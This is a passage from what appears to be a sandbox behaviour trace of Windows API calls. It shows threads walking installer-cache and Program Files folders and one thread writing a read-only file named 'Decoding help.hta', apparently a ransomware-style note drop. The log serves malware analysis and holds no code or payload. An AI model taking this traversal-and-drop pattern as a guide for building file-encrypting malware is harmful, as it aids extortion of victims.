Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\*.*" [0049.196] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\*.*") returned 95 [0049.196] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\", lpString2="vcRuntimeMinimum_x86" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86" [0049.196] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\*.*" [0049.196] GlobalMemoryStatus (in: lpBuffer=0x2091fd10 | out: lpBuffer=0x2091fd10) [0049.477] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10e66fd0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x580 [0049.616] CloseHandle (hObject=0x580) returned 1 [0049.616] FindNextFileW (in: hFindFile=0x5e2770, lpFindFileData=0x2091fd30 | out: lpFindFileData=0x2091fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcb95720, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xcbbb880, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0xcbbb880, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="vcRuntimeMinimum_x86", cAlternateFileName="VCRUNT~1")) returned 0 [0049.616] FindClose (in: hFindFile=0x5e2770 | out: hFindFile=0x5e2770) returned 1 Thread: id = 489 os_tid = 0xa14 [0045.332] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\*.*", lpFindFileData=0x20a5fd30 | out: lpFindFileData=0x20a5fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa989d730, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa989d730, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa989d730, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e2ab0 [0045.460] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0045.460] FindNextFileW (in: hFindFile=0x5e2ab0, lpFindFileData=0x20a5fd30 | out: lpFindFileData=0x20a5fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa989d730, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa989d730, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa989d730, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.460] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0045.460] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0045.460] FindNextFileW (in: hFindFile=0x5e2ab0, lpFindFileData=0x20a5fd30 | out: lpFindFileData=0x20a5fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa989d730, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa989d730, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa989d730, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Patch", cAlternateFileName="")) returned 1 [0045.460] lstrcmpW (lpString1=".", lpString2="Patch") returned -1 [0045.460] lstrcmpW (lpString1="..", lpString2="Patch") returned -1 [0045.460] lstrcmpiW (lpString1="windows", lpString2="Patch") returned 1 [0048.604] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\*.*" [0048.604] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\*.*") returned 86 [0048.604] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\", lpString2="Patch" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch") returned="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch" [0048.604] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\*.*" [0048.604] GlobalMemoryStatus (in: lpBuffer=0x20a5fd10 | out: lpBuffer=0x20a5fd10) [0048.604] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x24655338, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x460 [0048.620] CloseHandle (hObject=0x460) returned 1 [0048.620] FindNextFileW (in: hFindFile=0x5e2ab0, lpFindFileData=0x20a5fd30 | out: lpFindFileData=0x20a5fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa989d730, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa989d730, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa989d730, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Patch", cAlternateFileName="")) returned 0 [0048.620] FindClose (in: hFindFile=0x5e2ab0 | out: hFindFile=0x5e2ab0) returned 1 Thread: id = 490 os_tid = 0x9a8 [0045.332] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\*.*", lpFindFileData=0x20b9fd30 | out: lpFindFileData=0x20b9fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xedbebcc0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xedbebcc0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xedbebcc0, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e34f0 [0045.535] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0045.535] FindNextFileW (in: hFindFile=0x5e34f0, lpFindFileData=0x20b9fd30 | out: lpFindFileData=0x20b9fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xedbebcc0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xedbebcc0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xedbebcc0, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0048.799] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0048.799] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0048.799] FindNextFileW (in: hFindFile=0x5e34f0, lpFindFileData=0x20b9fd30 | out: lpFindFileData=0x20b9fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xedbebcc0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xedc37f80, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xedc37f80, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="vcRuntimeAdditional_x86", cAlternateFileName="VCRUNT~1")) returned 1 [0048.799] lstrcmpW (lpString1=".", lpString2="vcRuntimeAdditional_x86") returned -1 [0048.799] lstrcmpW (lpString1="..", lpString2="vcRuntimeAdditional_x86") returned -1 [0048.799] lstrcmpiW (lpString1="windows", lpString2="vcRuntimeAdditional_x86") returned 1 [0048.801] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\*.*" [0048.801] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\*.*") returned 95 [0048.801] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\", lpString2="vcRuntimeAdditional_x86" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86" [0048.801] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\*.*" [0048.801] GlobalMemoryStatus (in: lpBuffer=0x20b9fd10 | out: lpBuffer=0x20b9fd10) [0048.801] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x24ade230, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x5a4 [0048.808] CloseHandle (hObject=0x5a4) returned 1 [0048.809] FindNextFileW (in: hFindFile=0x5e34f0, lpFindFileData=0x20b9fd30 | out: lpFindFileData=0x20b9fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xedbebcc0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xedc37f80, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xedc37f80, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="vcRuntimeAdditional_x86", cAlternateFileName="VCRUNT~1")) returned 0 [0048.809] FindClose (in: hFindFile=0x5e34f0 | out: hFindFile=0x5e34f0) returned 1 Thread: id = 491 os_tid = 0x9ac [0045.332] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\*.*", lpFindFileData=0x20cdfd30 | out: lpFindFileData=0x20cdfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa931c450, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa931c450, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa931c450, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5db7f8 [0048.417] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0048.417] FindNextFileW (in: hFindFile=0x5db7f8, lpFindFileData=0x20cdfd30 | out: lpFindFileData=0x20cdfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa931c450, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa931c450, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa931c450, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0048.417] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0048.417] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0048.417] FindNextFileW (in: hFindFile=0x5db7f8, lpFindFileData=0x20cdfd30 | out: lpFindFileData=0x20cdfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa931c450, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa93425b0, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa93425b0, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="vcRuntimeMinimum_amd64", cAlternateFileName="VCRUNT~1")) returned 1 [0048.417] lstrcmpW (lpString1=".", lpString2="vcRuntimeMinimum_amd64") returned -1 [0048.417] lstrcmpW (lpString1="..", lpString2="vcRuntimeMinimum_amd64") returned -1 [0048.417] lstrcmpiW (lpString1="windows", lpString2="vcRuntimeMinimum_amd64") returned 1 [0048.418] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\*.*" [0048.418] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\*.*") returned 96 [0048.418] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\", lpString2="vcRuntimeMinimum_amd64" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64" [0048.418] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\*.*" [0048.418] GlobalMemoryStatus (in: lpBuffer=0x20cdfd10 | out: lpBuffer=0x20cdfd10) [0048.418] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5f18e80, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x63c [0048.428] CloseHandle (hObject=0x63c) returned 1 [0048.428] FindNextFileW (in: hFindFile=0x5db7f8, lpFindFileData=0x20cdfd30 | out: lpFindFileData=0x20cdfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa931c450, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa93425b0, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa93425b0, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="vcRuntimeMinimum_amd64", cAlternateFileName="VCRUNT~1")) returned 0 [0048.428] FindClose (in: hFindFile=0x5db7f8 | out: hFindFile=0x5db7f8) returned 1 Thread: id = 492 os_tid = 0x9b0 [0045.333] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\*.*", lpFindFileData=0x20e1fd30 | out: lpFindFileData=0x20e1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf94d4300, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0xf94d4300, ftLastAccessTime.dwHighDateTime=0x1d2fc27, ftLastWriteTime.dwLowDateTime=0xf94d4300, ftLastWriteTime.dwHighDateTime=0x1d2fc27, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d8810 [0048.427] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0048.427] FindNextFileW (in: hFindFile=0x5d8810, lpFindFileData=0x20e1fd30 | out: lpFindFileData=0x20e1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf94d4300, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0xf94d4300, ftLastAccessTime.dwHighDateTime=0x1d2fc27, ftLastWriteTime.dwLowDateTime=0xf94d4300, ftLastWriteTime.dwHighDateTime=0x1d2fc27, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0048.427] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0048.427] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0048.427] FindNextFileW (in: hFindFile=0x5d8810, lpFindFileData=0x20e1fd30 | out: lpFindFileData=0x20e1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf94d4300, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0xf94fa460, ftLastAccessTime.dwHighDateTime=0x1d2fc27, ftLastWriteTime.dwLowDateTime=0xf94fa460, ftLastWriteTime.dwHighDateTime=0x1d2fc27, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="vcRuntimeAdditional_x86", cAlternateFileName="VCRUNT~1")) returned 1 [0048.427] lstrcmpW (lpString1=".", lpString2="vcRuntimeAdditional_x86") returned -1 [0048.427] lstrcmpW (lpString1="..", lpString2="vcRuntimeAdditional_x86") returned -1 [0048.427] lstrcmpiW (lpString1="windows", lpString2="vcRuntimeAdditional_x86") returned 1 [0048.427] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\*.*" [0048.427] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\*.*") returned 96 [0048.427] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\", lpString2="vcRuntimeAdditional_x86" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86" [0048.427] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\*.*" [0048.427] GlobalMemoryStatus (in: lpBuffer=0x20e1fd10 | out: lpBuffer=0x20e1fd10) [0048.427] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x11651870, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x69c [0048.438] CloseHandle (hObject=0x69c) returned 1 [0048.438] FindNextFileW (in: hFindFile=0x5d8810, lpFindFileData=0x20e1fd30 | out: lpFindFileData=0x20e1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf94d4300, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0xf94fa460, ftLastAccessTime.dwHighDateTime=0x1d2fc27, ftLastWriteTime.dwLowDateTime=0xf94fa460, ftLastWriteTime.dwHighDateTime=0x1d2fc27, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="vcRuntimeAdditional_x86", cAlternateFileName="VCRUNT~1")) returned 0 [0048.438] FindClose (in: hFindFile=0x5d8810 | out: hFindFile=0x5d8810) returned 1 Thread: id = 493 os_tid = 0x9a4 [0045.970] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\*.*", lpFindFileData=0x20f5fd30 | out: lpFindFileData=0x20f5fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeed38550, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeed38550, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6718f0 [0045.971] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0045.971] FindNextFileW (in: hFindFile=0x6718f0, lpFindFileData=0x20f5fd30 | out: lpFindFileData=0x20f5fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeed38550, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeed38550, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.971] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0045.971] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0045.971] FindNextFileW (in: hFindFile=0x6718f0, lpFindFileData=0x20f5fd30 | out: lpFindFileData=0x20f5fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x723f8e00, ftCreationTime.dwHighDateTime=0x1c2e156, ftLastAccessTime.dwLowDateTime=0xeed38550, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x723f8e00, ftLastWriteTime.dwHighDateTime=0x1c2e156, nFileSizeHigh=0x0, nFileSizeLow=0xfa60, dwReserved0=0x0, dwReserved1=0x0, cFileName="EEINTL.DLL", cAlternateFileName="")) returned 1 [0045.971] lstrcpyW (in: lpString1=0x10970868, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\*.*" [0045.971] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\*.*") returned 68 [0045.971] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\Decoding help.hta" [0045.971] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\1033\\decoding help.hta")) returned 0xffffffff [0045.971] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\1033\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5dc [0045.971] WriteFile (in: hFile=0x5dc, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x20f5fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x20f5fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0045.972] CloseHandle (hObject=0x5dc) returned 1 [0045.973] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0045.973] lstrcmpiW (lpString1="Decoding help.hta", lpString2="EEINTL.DLL") returned -1 [0045.973] lstrlenW (lpString="EEINTL.DLL") returned 10 [0045.973] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\*.*" [0045.973] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\*.*") returned 68 [0045.973] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\", lpString2="EEINTL.DLL" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL" [0045.973] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL" | out: lpString1="\\\\?\\C:\\Program Files\\Common 